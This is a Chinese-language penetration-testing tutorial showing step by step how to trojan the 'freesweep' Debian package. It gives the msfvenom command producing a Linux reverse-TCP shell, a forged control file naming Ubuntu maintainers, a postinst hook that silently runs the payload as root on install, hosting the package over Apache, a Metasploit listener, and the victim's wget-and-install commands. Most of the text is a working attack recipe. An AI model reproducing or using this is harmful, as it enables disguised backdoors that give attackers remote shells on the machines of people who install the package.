2022-渗透测试-制作恶意deb软件包来触发后门

简介: 2022-渗透测试-制作恶意deb软件包来触发后门

目录

1.下载软件包

2.解压软件包

小知识1:kali更新或安装包的目录

小知识2:kali解压或安装操作

3.生成恶意代码到软件包源文件中

4.创建软件包信息目录

5.重新生成一个软件包

6 将deb提供下载

7 启动msfconsole

8.配置监听

10 目标机下载并安装带木马的deb软件

11.目标机安装软件

12 监控端获取到session

1.下载软件包

kali安装软件包

apt install 软件名称

image.gif

kali下载软件包

apt --download-only install 软件名称

image.gif

如图,下载软件包

apt --download-only install freesweep

image.gif

image.gif编辑

2.解压软件包

小知识1:kali更新或安装包的目录

kali系统更新或安装的包目录:/var/cache/apt/archives/

image.gif编辑

我们去查找刚刚下载的包,使用ls | grep free

image.gif编辑

将这个包移动到跟目录下,便于后面的操作 mv ./freesweep_1.0.2-1_amd64.deb ~/

image.gif编辑

image.gif编辑

小知识2:kali解压或安装操作

安装:dpkg -i

解压:dpkg -x

我们将软件包解压

dpkg -x freesweep_1.0.2-1_amd64.deb free

image.gif

image.gif编辑

切换到free目录,查看文件列表

image.gif编辑

3.生成恶意代码到软件包源文件中

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
LHOST=192.168.0.109 LPORT=4444 -b "\x00" -i 10 -f elf -o
/root/free/usr/games/freesweep_sources

image.gif

扩展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。

4.创建软件包信息目录

创建软件包目录

mkdir free/DEBIAN

切换目录

cd free/DEBIAN

编辑

vim  /root/free/DEBIAN/control

Package:freesweep
Version:1.0.1-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers(ubuntu-motu@lists.ubuntu.com)
Description:a text-based minesweeper Freesweep is an implementation of the
popular minesweeper game,where one tries to find all the mines without igniting
any,based on hints given by the computer.Unlike most implementations of this
game,Freesweep works in any visual text display - in Linux console,in an
xterm,and in most text-based terminals currently in use.

image.gif

image.gif编辑

创建deb软件包,安装后脚本文件,来加载后门

tee /root/free/DEBIAN/postinst << 'EOF'
#!/bin/bash
sudo chmod 755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

image.gif

image.gif编辑

给postinst加执行权限

chmod 755 /root/free/DEBIAN/postinst

image.gif

image.gif编辑

5.重新生成一个软件包

dpkg-deb --build /root/free/

image.gif

6 将deb提供下载

systemctl start apache2
systemctl status apache2

image.gif

将free.deb复制到apache2 根目录

cp free.deb /var/www/html/

image.gif

7 启动msfconsole

8.配置监听

msf5 \> use exploit/multi/handler

image.gif

加载payload

msf5 exploit(multi/handler) \> set payload linux/x64/meterpreter/reverse_tcp

image.gif

设置监听主机

msf5 exploit(multi/handler) \> set lhost 192.168.31.53

image.gif

查看需要配置的参数

msf5 exploit(multi/handler) \> show options

image.gif

run

10 目标机下载并安装带木马的deb软件

wget http://192.168.0.109/free.deb

image.gif

11.目标机安装软件

dpkg -i free.deb

image.gif

12 监控端获取到session

相关文章
|
3月前
|
测试技术 语音技术
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
59 0
|
2月前
|
Android开发
Android学习 —— 测试init.rc中的条件触发的处理顺序
Android学习 —— 测试init.rc中的条件触发的处理顺序
|
3月前
|
Docker 容器
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
32 0
|
4月前
|
Java jenkins 持续交付
Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试
【7月更文挑战第1天】Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试。成功后,Jenkins执行部署任务,发布到服务器或云环境。使用Jenkins能提升效率,保证软件质量,加速上线,并需维护其稳定运行。
121 0
|
5月前
|
SQL 存储 关系型数据库
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
32 0
|
6月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
|
测试技术
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
113 0
为什么Spartacus单元测试里对http返回的Observable对象调用subscribe时,会触发依赖注入的框架代码
|
测试技术
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗
170 0
在Angular单元测试代码的it方法里连续调用两次detectChange方法,会触发两次ngAfterViewInit吗